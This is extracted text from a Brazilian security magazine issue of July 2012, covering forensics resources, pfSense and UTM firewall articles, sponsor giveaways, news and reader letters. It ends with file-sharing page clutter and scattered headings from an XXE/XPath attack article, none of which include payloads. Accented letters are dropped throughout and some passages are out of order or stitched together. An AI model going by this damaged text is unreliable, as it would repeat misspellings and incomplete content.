Data Security Segurana da Informao e Forense Computacional Clavis Segurana da Informao Legaltech Consultoria, Pericia e Treinamento TechBiz Forense Digital 4Linux Free Software Solutions
Eventos:
ICCYBERConferncia Internacional em Crimes Cibernticos ICOFCS Conferncia Internacional sobre Cincia da Computao Forense Congresso Crimes Eletrnicos e Formas de Proteo SBSeg Simpsio Brasileiro de Segurana da Informao e de Sistemas Computacionais H2HC Hackers To Hackers Conference BHack Segurana da Informao OWASP Floripa Day
Livros:
Investigao e Percia Forense Computacional Autores: Claudemir Queiroz e Raffael Vargas Forense Computacional Corporativa Autor: Reynaldo Ng Desvendando a Computao Forense Autores: Pedro Monteiro da Silva Eleutrio e Marcio Pereira Machado Computao Forense Com Software Live Autor: Sandro Melo Percia Forense Computacional Autores: Dan Farmer e Witse Venema Percia Forense Aplicada Informtica Autor: Andrey Rodrigues de Freitas Kit de Ferramentas Forense Ambiente Microsoft Autor: Andrey Rodrigues Freitas Crimes de Informtica e seus Aspectos Processuais Autora: Carla Rodrigues Arajo de Castro Provas Cibernticas no Processo Autor: Paulo Roberto de Lima Carvalho O Direito na Era Digital: Crimes Praticados por Meio da Informtica Autora: Sandra Gouva Computao Forense Autor: Marcelo Antonio Sampaio Lemos Costa Crimes de Informtica Autor: Fabrcio Rosa
Sites: http://foren6.wordpress.com http://www.crimespelainternet.com.br http://www.infopericia.com.br http://4en6br.wordpress.com http://www.apcf.org.br Facebook Grupo Forense Digital Pericia em Informtica e telecomunicaes https://www.facebook.com/groups/190737827707978/ https://www.facebook.com/groups/216366638481732 Fontes: http://www.legaltech.com.br/ http://desmontacia.wordpress.com/2010/08/12/quer setornarumpertoemforensedigitalvejaasdicas/
Ngila Magalhes
Graduada em Tecnologia em Redes de Computadores pela FCAT e Ps graduanda em Segurana Computacional pelo IESAM. Apaixonada por tecnologia e ciberespao, tenho em especial conhecimento nas reas de segurana computacional e computao forense pelo qual tenho enorme interesse e admirao. Atualmente atuando como colu nista na rea computacional.. Email: nagilamagalhaes@gmail.com Twitter: @netnagila
|44
Sistema de Firewall no estilo Appliance
o atual cenrio mundial, onde a concorrncia acirrada e determinante para o sucesso das em presas, a inovao e flexibilidade perante as mu danas so o grande diferencial para empresas de quaisquer segmentos.
A Informao assume, hoje em dia, uma importn cia crescente, ela tornase fundamental em qualquer instituio na descoberta e introduo de novas tec nologias, explorao das oportunidades de investi mento. Existem muitas ferramentas de proteo oferecida pelo mercado, cada ferramenta com o seu propsito e especificidades. A cada dia, novas formas de ataques esto sendo desenvolvidas com o intuito de burlar es tas ferramentas, assim, imperativo que as empresas, alm de fomentarem a cultura de segurana para pro teger seus ativos investindo na implantao de ferra mentas de segurana, mantenham estas ferramentas atualizadas. Dentre muitos Firewall comerciais existentes no mercado como SonicWall, Aker e TMG temos muitas opes de Firewall baseados em software livre como, Untangle, Endian, Zentyal e pfSense, destes o pfSen se vem se destacando significativamente. O pfSense uma distribuio livre, open source e personalizada do FreeBSD adaptada para ser usada como firewall e roteador. Alm de ser uma poderosa
e flexvel plataforma de firewall e roteamento, ele inclui uma longa lista de recursos relacionados e um sistema de pacotes permitindo futuras expanses, sem acrescentar falhas e vulnerabilidades de segu rana em potencial na base da distribuio, o pfSense um projeto popular com mais de 1 milho de downloads desde seu incio, inmeras instalaes que vo desde pequenas redes domsticas, protegendo desde um PC ou um Xbox, at grandes corporaes, universidades e outras organizaes protegendo mi lhares de dispositivos de rede. Este projeto comeou em 2004 como um fork do projeto m0n0wall, mas com foco para as instalaes em um PC ao invs do foco em hardwares embarca dos do m0n0wall. O pfSense tambm oferece uma imagem embar cada para instalaes baseadas em Compact Flash, porm este no nosso foco principal. Com uma imagem de apenas 60MB voc grava um livecd e tem todas as opes e configuraes atravs de uma interface web. O pfsense suporta a grande maioria de servios necessrios a qualquer fi rewall e/ou gateway de rede, alguns exemplos so DHCP, DNS, firewall, traffic shaper, VPN, NAT, Proxy squid, squidGuard, Captive Portal, balancea mento de links e muitas outras caractersticas. O pf sense possui ainda a capacidade de receber novos
|45
pacotes e funcionalidades tudo instalado pelo nave gador (WebGui). Toda a configurao armazenada em um arquivo nico no formato XML, facilitando o backup e restore . A visualizao de grficos do trfe go da rede e arquivos de logs do sistema tambm so visualizado pela web, tudo prconfigurado e muito amigvel e ainda h possibilidade de se instalar o Zabbix, ntop, mrtg e outros. O pfSense engloba os itens bsicos como facilida de de instalao, compatibilidade de hardware, ge renciamento remoto, atualizaes de segurana, valor agregado e robustez pois roda como base o poderoso FreeBSD. O pfSense tem se mostrado uma tima opo para administradores de redes, grandes ou pequenas, por sua facilidade de instalao e configurao, que fei ta atravs de uma interface web muito amigvel sem que seja necessrio digitar uma nica linha de co mando. Alm da facilidade de manuteno, o pfSense disponibiliza um grande nmero de recursos como: Mdulo Firewall: Assistente de configurao Fcil backup e restaurao do sistema Firewall Statefull com suporte a operaes de fil tro de pacotes Facilidade de criao, edio e alterao de re gras de firewall Rotas estticas Compartilhamento de acesso Internet Alias e agendamento para regras de firewall Bloqueio por IP de programas P2P e chat: Google Talk, ICQ, Yahoo Messenger Monitor de atividade do firewall Servidor DHCP, NTP Walk on Lan DNS forwarder e dinmico (no ip,dyndsn,easydns) Mdulo para leitura e filtros de Logs Recurso SNMP, usado na monitorao remota e gerenciamento Relatrios e grficos de utilizao de banda Mdulo Proxy Filtra e monitora acessos Internet por usurio, grupo, horrios e endereo IP Bloqueia acessos Internet por contedo, dom nios e expresses regulares
Proxy em modalidades transparente Relatrios de acessos e estatsticas de uso HAVP Mdulo de antivrus integrado. Mdulo VPN Interligao de filiais utilizando a Internet como meio fsico Suporta conexes com IP Dinmico (noip) Suporte as implementaes Ipsec, OpenVpn , PPTP e PPPoE
Mdulo Balanceamento de carga Capacidade de balancear a saida da internet em dois links para prover aproveitamento e alta disponibilidade, no caso de falha o link ativo assume todo o trfego automaticamente (load balance) Garante a redundncia de links e VPN(s), onde em caso de falha o link secundrio assume automaticamente e reestabelece as VPNs (failover)
Mdulo IDS Intrusion Detection System Deteco de tentativas de invaso Bloqueio automtico de tentativas de invaso Deteco e bloqueio de diversos tipos de scanning de rede Atualizaes das bases de deteco de intruso Atualmente o pfSense est disponvel apenas na lngua inglesa, porm, alguns desenvolvedores brasi leiros esto juntando esforos para implementar o suporte a multilnguas, assim ser possvel disponi bilizar tradues para vrios idiomas.
Jorge Daniel da S. Valente
AGraduado em Tecnologia em Redes de Computadores e PsGraduando MBA em Segurana da informao. instrutor LCI na SafeNode Linux e consultor de solues de segurana e administrao de sistemas Linux, Entusiasta de Software Livre. Especializaes. CLA Novell Certified Linux Administrator LPIC1 Linux Professional Institute Certified Level 1 MCP Microsoft Certified Professional. Twitter: @jdaniel_am Email: jorgdaniel@gmail.com
|46
Wallpaper do Endian. Essa imagem de uma das vrias solues de Ap pliance existentes no mercado.
Solues de UTM - Unified threat management
s solues de UTM tm sido cada vez mais ado tadas em empresas de pequeno, mdio e at em algumas de grande porte, uma soluo SMB e consiste de um hardware denominado Appliance ou en to uma mquina virtual denominadaVirtual Appliance.
A soluo de UTM costuma ter um custo benefcio mais interessante quando se procura miti gar problemas de segurana em uma rede corporati va, pois em uma nica soluo voc tem as funcionalidades de Firewall, AV, IDS, IPS, DLP, Web Filter, Application Control, entre outras. Exis tem diversos fabricantes no mercado, entre os mais famosos esto, por exemplo, a Fortinet, a SonicWall e a Astaro que recentemente foi adquirida pela Brit nica Sophos . Existem empresas que preferem popular o seu am biente com equipamentos que tm funes especfi cas, assim colocando um equipamento apenas para firewall, outro para IPS, outro para Web Filter, outro para AntiSpam e assim sucessivamente. A principal vantagem disso que seu ambiente no fica total mente dependente de um nico equipamento ou vir tual apliance, como o UTM, que responsvel por tudo e que se parar, voc ter todas as funcionalida des de segurana suspensas at resolver o problema, porm este cenrio com todas as funes separadas
por equipamentos bem mais cara, uma forma de se proteger de um problema com o UTM a configura o de cluster, onde voc tem por exemplo dois equi pamentos interligados, desta forma se um deles parar o outro mantm todo o ambiente funcionando. Um UTM no a soluo para tudo quando o as sunto segurana de TI, sabemos que para manter os 3 pilares da segurana da informao, que so Confi dencialidade, Integridade e Disponibilidade, diversos outros fatores devem ser observados, como uma boa soluo de Antivrus, hoje muitos deles chamados de Endpoints por possurem funcionalidades muito alm de apenas barrar vrus e a conscientizao humana, instruir os colaboradores a usarem os recursos de TI de forma eficiente e segura. Explicao de algumas das funcionalidades en contradas em um UTM. a. IPS: Sistemas de preveno de intruso, as principais funes dos sistemas de preveno de in truso so identificar atividade maliciosa, registrar informaes sobre essas atividades e bloquelas. O IPS considerado extenso do IDS Sistema de deteco de intruso, mas a principal diferena , ao contrrio dos sistemas de deteco de intruso, sistemas de preveno de intruso so colocados em linha e so capazes de prevenir ativamente / bloquear
|47
intruses que so detectados. J o IDS apenas detecta e registra as atividades maliciosas encontradas. b. DLP: Preveno de vazamento de dados, sis tema desenvolvido para detectar potenciais inciden tes de violao de dados em tempo hbil e impedilos, realiza o monitoramento constante, en quanto os dados esto em uso, em movimento (trfe go de rede), e em repouso (dados armazenados). Em incidentes de vazamento de dados, os dados sensveis so divulgados a pessoas no autorizadas, quer por dolo ou erro inadvertido. Tais dados sens veis pode vir na forma de informao particular, pro priedade intelectual, informaes financeiras, dados de cartes de crdito e outras informaes, depen dendo do negcio. c. Web Filter: O filtro Web um recurso que veri fica a origem ou o contedo de uma pgina Web com um conjunto de regras estabelecidas pela empresa ou pessoa que tenha instalado o filtro Web. O filtro Web permite que uma empresa ou usurio individual blo queie sites https/https que possuem contedo censu rvel, como pornografia, jogos, torrents, vdeos e msicas, e at sites que possam conter spyware e v rus, o filtro Web normalmente possui categorias pr estabelecidas, onde ao bloquear uma categoria como por exemplo Jogos, todos os sites relacionados a jogos so bloqueados, alm disso, uma grande vanta gem deste recurso a economia de banda do link de internet, pois apenas contedo relevante estar pas sando pelo UTM. Os acessos proibidos e permitidos podem ser mo nitorados atravs de relatrios que do as informa es em tempo real.
Alguns exemplos
http://www.fortinet.com/ http://www.sonicwall.com/ http://www.checkpoint.com/ http://www.astaro.com Open Source: http://www.pfsense.org/
Concluso
O objetivo final de um UTM fornecer um con junto abrangente de recursos de segurana em um nico produto gerenciado atravs de um nico conso le, sua adoo tem crescido muito nos ltimos anos e este crescimento no ir parar, prova disso que as fabricantes todos os anos lanam novas verses de equipamentos, com melhorias, novos recursos e prin cipalmente maior robustez.
O pfSense um software livre, licenciado sob BSD license (a marca pfSense em si tem Copyright para o BSD Permiter), baseado no sistema operacio nal FreeBSD e adaptado para assumir o papel de um firewall e/ou roteador de redes. Alm disso, ele pos sui atualmente dezenas de pacotes adicionais que lhe permitem requisitar o posto de UTM (Unified Threat Management), j que podemos realizar com o pfSen se a imensa maioria das atividades que esperamos de sistemas com este ttulo. Funes importantes e muito usadas em outras solues, esto presente no pfSense, como o Squid Guard, mais recentemente o DansGuardaian, ambos como funo de Webfilter, sistema de IPS e IDS ba seado em Snort, VPN com SSL, PPTP, OpenVPN e IPSec, alm de Antivrus com uma eficincia fants tica. A comunidade pfSense grande, com diversos colaboradores pelo mundo todo, uma soluo que no deixa a desejar em nada se comparar com algu mas solues pagas.
Ivanildo Galvo
Consultor de Tecnologia, trabalha atualmente na IT Services em Natal/RN Especialista focado em solues de Datacenter (Servidores, Storages, Redes e Virtualizao) MCP, MCT, MCSA, VSP, VTSP, ITIL Foudation V3.
Twitter: @ivanildogalvao Email: ivanildogalvao@gmail.com
|48
Parceiros
Nessa edio especial de aniversrio pedimos o apoio de nossos parceiros para poder presentearmos os nossos leitores. Logo abaixo segue os presentes oferecidos por parceiros. Voc, leitor, pode participar de quantos sorteios quiser, aumentando ainda mais suas chances de ganhar...
Os sorteios sero realizados a partir do dia 12/08, sendo um por dia de acordo com as instrues de cada pgina abaixo.
|49
PARCEIRO 4Linux
Aqui voc concorre ao sorteio de um curso de (Pen test: Teste de Invaso em Redes Corporativas) na modalidade EaD: http://www.4linux.com.br/cursos/cursosseguranca.html#curso507
Para participar publique no twitter: Eu quero um curso de "Pen test: Teste de Invaso em Redes Corporativas" @_SegDigital @4linuxbr
|50
PARCEIRO Brasport
No conseguiu visualizar o QRCode? Ento utilize o link abaixo: www.brasport.com.br/index.php?dispatch=promotions.set&code=segdigital
|51
PARCEIRO Brasport
Sorteio Brasport
Nessa edio de aniversrio estaremos junta mente com a Brasport sorteando uma unidade do Livro (Investigao e Percia Forense Computacional), para participar deste sorteio publique no twitter:
Eu quero participar do sorteio (Livro Investigao e Percia Forense Computacional) @_SegDigital @Brasport
Descrio
A incorporao de sistemas de computador como uma ferramenta para aspectos particulares, comerci ais, educacionais, governamentais e outras da vida moderna tem melhorado a produtividade e a eficincia de pessoas e entidades. Da mesma forma, a introduo de computadores como uma ferramenta criminal aumentou a capacidade dos criminosos para realizar, ocultar ou auxiliar a atividade ilegal ou antitica. Em particular, o surto de aptido tcnica, juntamente com o anonimato, parece encorajar crimes utili zando sistemas de computador, pois h pouca chance de ser perseguido e encontrado. Estes cybercri mes no so necessariamente novos crimes, mas sim crimes clssicos explorando o poder de computao e o acesso informao.
|52
PARCEIRO Academia Clavis
Aqui voc concorre ao sorteio de dois timos cursos EaD de nossa parceira Academia Clavis Fortalecimento de Servidores UNIX/Linux e Teste de Invaso em Redes Sem Fio
Para participar publique no twitter: Eu quero um curso de "Fortalecimento de Servidores UNIX/Linux" @_SegDigital @clavissecurity ou Eu quero um curso de "Teste de Invaso em Redes Sem Fio" @_SegDigital @clavissecurity
|53
PARCEIRO DataSecurity
|54
PARCEIRO HostDime
Nessa edio de aniversrio estaremos junta mente com a HostDime sorteando uma unidade do Livro (Segurana em Redes Fundamentos), para participar deste sorteio publique no twitter:
Eu quero participar do sorteio (Livro Segurana em Redes Fundamentos) @_SegDigital @hostdimebr
Depoimento HostDime
A qualidade e seriedade dos projetos conduzidos por Fbio Jnio contriburam para que a rela o de confiana entre SeguranaDigital e a HostDime continuasse se fortalecendo a cada inte rao.
|55
PARCEIRO Kryptus
Kryptus MorphingID: uma soluo inovadora e eficaz contra fraudes de roubo de identidade em mquinas
metimento do equipamento do usurio final. Esta ca racterstica da soluo nica no mercado e no demanda hardware especial, independente de siste ma operacional e no altera a experincia de usurio. O MorphingID o resultado de dois anos de pesqui sa e desenvolvimento conjunto entre KRYPTUS e o Laboratrio de Criptografia Aplicada da UNICAMP. Alm disso, ela se integra com outros produtos que a empresa desenvolveu para o setor bancrio, como por exemplo, o Genius AntiPhishing (soluo de combate ao furto de informaes) tambm lanado na CIAB 2012. O MorphingID, que j comeou a ser testada por alguns bancos brasileiros, pode ser diretamente utili zada pelas instituies financeiras ou ser licenciado para os atuais provedores de sutes de solues de Internet Banking, funcionando de forma modular. uma soluo inovadora e simples de ser integrada, seja com solues de IB, seja com outras solues antifraude, cada vez mais comuns em sistemas de compras online e sistemas de redes sociais. Sobre a Kryptus (http://www.Kryptus.com/) Empresa 100% brasileira, fundada em 2003 na ci dade de Campinas/SP, a Kryptus j desenvolveu uma gama de solues de hardware, firmware e software para clientes Estatais e Privados variados, incluindo desde semicondutores at aplicaes criptogrficas de alto desempenho, se estabelecendo como a lder brasileira em pesquisa, desenvolvimento e fabricao de hardware seguro para aplicaes crticas. Os clientes Kryptus procuram solues para pro blemas onde um alto nvel de segurana e o domnio tecnolgico so fatores fundamentais. No mbito go vernamental, solues Kryptus protegem sistemas, dados e comunicaes to crticas como a Infraestru tura de Chaves Pblicas Brasileira (ICPBrasil), a Urna Eletrnica Brasileira e Comunicaes Gover namentais.
O Internet Banking (IB) no Brasil surgiu em mea dos da dcada de 90, onde os usurios retiravam nas agncias de seus bancos disquetes com os programas de IB, os quais realizavam pagamentos online atravs da linha discada que desde seus primrdios j atingia milhares de usurios no pas. Esses aplicativos contavam com mecanismos de autenticao simples e desde cedo apresentavam vul nerabilidades exploradas por pessoas mal intenciona das. Dentre as principais fraudes praticadas sobre essas vulnerabilidades, esto o phishing e o roubo de identidade (identity theft). Phishing uma modalidade de fraude ciberntica onde o atacante, de alguma forma, invade a mquina do usurio ou o induz a passar seus dados atravs de pginas web falsas, roubando dados pessoais (senha, nmero de agncia e conta, nmero de carto de cr dito). Roubo de identidade (Identity theft) uma outra modalidade de fraude, na qual o atacante se passa pe lo usurio, clonando e utilizando suas credenciais, para efetuar operaes (transferncias, pagamentos, etc.). As solues de IB utilizadas hoje em dia evolu ram muito em termos de melhorias das funcionalida des e de eliminao de vulnerabilidades. Atualmente, elas fazem uso de modernas tecnologias de identifi cao de quem est acessado o sistema, alm de apre sentar interfaces de uso bastante avanadas (que hoje, segundo a FEBRABAN, ultrapassa 30 milhes s no Brasil). No entanto, ainda com essas solues mais atuais, o nmero de fraudes do tipo roubo de identidade (identity theft) varia de 15% a 20% do total de frau des em servios web. Alm disso, nos Estados Uni dos, mais de 3,5 milhes de usurios j foram vtimas de phishing, somando mais de 3 bilhes de dolres em perdas financeiras. No sentido de virtualmente erradicar a fraude de roubo de identidade, a KRYPTUS apresentou no Es pao Inovao na CIAB 2012 (maior evento da Am rica Latina tanto para o setor financeiro quanto para a rea de Tecnologia), a soluo de identificao de mquinas denominada MorphingID. O MorphingID utiliza tecnologia indita e paten teada capaz de gerar identificadores de computadores que no podem ser copiados, mesmo com o compro
|56
Depoimento do fundador do projeto

Para aqueles que no me conhecem segue uma breve apresentao: Sou um cara simples, tenho 22 anos e meu nome Fbio Jnio, carrego comigo o desejo por compartilhar o conhecimento que possuo e incentivar os demais a fazer o mesmo. At o presente momento, administro mais de trs projetos slidos e em constante crescimento, e j tenho plane jado o lanamento de mais um para este ano.
Voltando ao projeto Revista Segurana Digital

Obstculos, dificuldades e provaes foi o que este projeto enfrentou at chegar o que hoje. E pensar que resolvi montar uma revista quando estava escrevendo um tutorial sobre um appliance chamado Endian. No incio foi muito difcil, pois era uma ideia sustentada e levada frente por uma nica pessoa: eu! Logo aps o lanamento da primeira edio, encontrei outras pessoas que tinham o desejo por compartilhar o conhecimento assim como eu. At hoje conto com o apoio delas, deixando aqui forte agradecimentos a Johnantan Pereira e Luiz Felipe, editores da revista. Com tamanha cre dibilidade passada por este projeto, rapidamente empresas importantes se juntaram a essa cau sa e passaram a apoiar essa iniciativa.
Mensagem para os colaboradores da revista

Deixo meus mais sinceros agradecimentos a todos aqueles que contribuem ou contriburam para com o crescimento deste projeto, sem vossa contribuio no teramos chegado at aqui. Obri gado a todos. Bom, vou me despedindo por aqui e deixando voc, leitor, prosseguir com a leitura da revista.
|57
Eduardo Fedorowicz (Agenda TI) MBA Gerenciamento de Projetos pela FGV graduado em Cincia da Computao pela UGF. Mais de 14 anos de experincia em TI, atuando nos ltimos 9 anos na rea de Segurana de TI. Mantm desde 2011 o site www.agendati.com.br que rene em um s lugar os principais eventos, congressos e workshops de Segurana da Informao, Inovaes Tecnolgicas e Tendncias de TI. Email: eduardo@fedorowicz.com.br Site : http://www.agendati.com.br Twitter: @fedorowicz @agendati
|58
NOTCIAS
Ataques ao Android so demonstrados du rante conferncia Ataques ao sistema operacional mvel Android em smartphones foram demonstrados durante a conferncia Black Hat, nos Esta dos Unidos. De acordo com o site CNET, o especialista em seguran a Charlie Miller apresentou uma forma de invadir o sistema utilizando a tecnologia Near Field Communication (NFC). O recurso NFC conta com antenas embutidas e utilizado em cartes de memria e outros acessrios projetados para trans mitir dados a leitores que usam a mesma tecnologia, desenvolvida para funcionar a partir da proximidade fsica e enviar informaes como URLs da web e n meros telefnicos para smartphones. Serve para com partilhar arquivos e at para confirmar compras em terminais de pagamento.. >> http://migre.me/a5GY8 Apple compra AuthenTec por US$ 356 mi lhes A AuthenTec, empresa de se gurana para computadores e dispositivos mveis, aceitou a proposta de compra feita pela Apple, no valor de 356 mi lhes de dlares.A compra foi anunciada pela AuthenTec aps firmar acordo com a Ma, que passa a ter todas as licenas de uso de sua tecnologia de hardware e software, bem como seu portflio de patentes. Entre os clientes da AuthenTec, esto empresas como AlcatelLucent, HP, Lenovo, LG, Motorola, Nokia e at mesmo a Samsung, que enfrenta diversos conflitos judiciais com a Apple atualmente. >> http://migre.me/a5H4i
'Pwnie Awards' revela vencedores do 'Oscar' da segurana de dados Os vencedores das 7 categori as da premiao de segurana "Pwnie Awards" foram anunci ados durante a conferncia de segurana Black Hat, em Las Vegas, nos Estados Unidos. A competio, que iniciou como uma brincadeira, j est na sexta edio e busca reconhe cer com bom humor grandes feitos do ramo da segurana. O nome da premiao um trocadilho com as palavras "pnei" e "own". "Own" significa "possuir" em usada como gria de internet para "do minao", seja na invaso de um sistema ou por um jogador que est se dando bem em um game. A pala vra own s vezes intencionalmente escrita como "pwn", devido ao frequente erro de digitao trocan do a letra "o" por "p". >> http://migre.me/a5H0x
TSE alerta sobre e mail falso que coleta da dos pessoais O TSE (Tribunal Superior Eleitoral) divulgou nesta quintafeira (26) que um e mail falso usa o nome do tri bunal para coletar dados dos eleitores. O comunicado ele trnico diz que o ttulo de eleitor do internauta est suspenso e pede a regularizao do documento. A mensagem tambm recomenda preencher um formu lrio com os dados pessoais. O tribunal recomenda apagar qualquer mensagem com estas caractersticas. Em nota, o TSE afirma que muitas pessoas entraram em contato por telefone para esclarecer dvidas sobre o email falso. >> http://migre.me/a5H3T
Contribua com nosso projeto? Envie um email para nossa equipe! contato@segurancadigital.info
|59
COLUNA DO LEITOR
EMAILS, SUGESTES E COMENTRIOS

Esta seo foi criada para que possamos compartilhar com voc leitor, o que andam falando da gente por a... Contribua para com este projeto: (contato@segurancadigital.info).
Pedro Cunha (por E mail) Descobri hoje a vossa revista e acho fenomenal e louvvel a iniciativa. Como algum que pretende seguir este ramo profissional, espero aprender ain da mais com os vossos artigos. Continuem o bom trabalho! Ado Santos (por E mail) Bom dia pessoal da seguranadigital.info! Olha gostaria de parabenizlos pela qualidade do traba lho desenvolvido na edio desta revista, um nvel de excelncia realmente adimirvel, matrias bas tante interessantes e relevantes, principalmente para aqueles trabalham no universo da TI. Gosta ria de solicitar uma matria cujo contedo explici te as diferenas e implicaes de seguraa, no contexto da utilizao de virtualizao e emula o. Renato (por E mail) Um amigo me apresentou a Revista Segurana Di gital e desde que comecei a ler a primeira edio no consegui mais parar. Parabns pelo bom traba lho e continuem assim. Gabriel (por E mail) Antes de qualquer coisa deixo meus parabns pelo timo trabalho de vocs. Essa revista trabalha s com artigos de primeira, muito bom mesmo. Em uma de suas edies o Fbio publicou um tutorial sobre DenyHosts se no me engano, gostei muito pois algo que acabei implementando na empresa onde trabalho. Gostaria de mais artigos do gne ro... Bruno Faria (no Site) Muito bom o contedo da revista! Trabalhamos com Fortinet aqui na empresa que engloba exata mente esse conceito de Firewalls de nova gerao. Artigo muito bom! Acho que os profissionais de SI precisavam de uma referncia assim!. Jose S Barbosa (no Site) Estava procurando assunto sobre segurana e me deparei com esse site. Parabns! Os assuntos abordados nas revistas superaram em muito o que eu estava a procura. Paulo (no site) Show! Parabns a todos os envolvidos no desen volvimento dessa revista simplesmente show... Continuem assim pois estou aguardando o lana mento da prxima edio. Le ona r do Guim a r e s (no Twit te r ) Eu recomendo. @salgado_bruno: Baixe j a 6 edio da Revista Segurana Digital http://dld.bz/b3Zhj (via @_SegDigital)
|60
Segurana Digital
7 Edio Julho de 2012
www.segurancadigital.info
@_SegDigital segurancadigital

7 Edicao Julho 31 07 2012

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

7 Edicao Julho 31 07 2012

Diunggah oleh

Hak Cipta:

Format Tersedia

VOC PODE:

Copiar, distribuir, criar obras derivadas e exibir a obra.

COM AS SEGUINTES CONDIES:

Julho 2012 segurancadigital.info

Oel Ngati Kameie.

Por Luiz Felipe Ferreira

Julho 2012 segurancadigital.info

Academia Clavis Data Security HostDime Kryptus

Depoimento do fundador do projeto

Julho 2012 segurancadigital.info

Julho 2012 segurancadigital.info

Como Atacantes Podem Manipular sua Aplicao?

2. XML External Entity (XXE) Attack

ARTIGO Segurana Digital <ListaClientes><NomeCliente>Teste</NomeCliente></ ListaClientes>

A aplicao poderia responder da seguinte forma:

Se a aplicao estivesse vulnervel, a seguinte resposta seria retornada:

ARTIGO Segurana Digital

pode ser utilizado para consumir a memria de um servidor, tornandoo indisponvel.

Julho 2012 segurancadigital.info

ARTIGO Segurana Digital

<Pontos>2500</Pontos> <MetodoEntrega>2</MetodoEntrega> </Resgate> </pre:Add> </soap:Body> </soap:Envelope>

4. Ataques de Negao de Servio em Web Services

ARTIGO Segurana Digital

Neste caso, a aplicao realizaria a seguinte con sulta XPATH:

A seguinte consulta XPATH seria realizada:

Julho 2012 segurancadigital.info

ARTIGO Segurana Digital

Isto resultaria na seguinte consulta XPATH:

ARTIGO Segurana Digital

Bruno Cesar Moreira de Souza

Julho 2012 segurancadigital.info

Anlise Forense Computacional de Ambientes Virtualizados na Plataforma VMWare

II Anlise Forense Computacional De Ambientes Virtuais

ARTIGO Segurana Digital

ARTIGO Segurana Digital

2.1 Mquinas Virtuais como Plataforma Forense Computacional

2.2 Preparo de Ambientes Virtuais para Anlise Forense Computacional

2.3 Coleta de Dados Forenses em Ambi entes Virtuais Localizao e Captura

ARTIGO Segurana Digital

2.3.1 Deteco de Mquinas Virtuais Pro mscuas

ARTIGO Segurana Digital

Julho 2012 segurancadigital.info

ARTIGO Segurana Digital

2.3.2 Diferenas entre Real e Virtual

2.3.3 Coleta de Mquinas Virtuais

ARTIGO Segurana Digital

de uma VMware suspensa (.vmss).

2.3.5 Ferramentas para Localizao e Co leta de Mquinas Virtuais

ARTIGO Segurana Digital

ARTIGO Segurana Digital

2.3.6 Coleta entre Ambientes Virtuais

Continua na prxima edio...

Deivison Pinheiro Franco

Email: deivison.pfranco@gmail.com Link: http://lattes.cnpq.br/8503927561098292

Julho 2012 segurancadigital.info

OWASP Floripa Day

Sobre o captulo de Florianpolis

http://www.owasp.org https://www.owasp.org/index.php/Florianopolis OWASP Floripa Day: https://www.owasp.org/index.php/OWASP_Floripa_D ay_2012

Julho 2012 segurancadigital.info

ARTIGO Segurana Digital

Figura 1 - Profissional "faz tudo".

ARTIGO Segurana Digital

Leonardo Pereira Guimaraes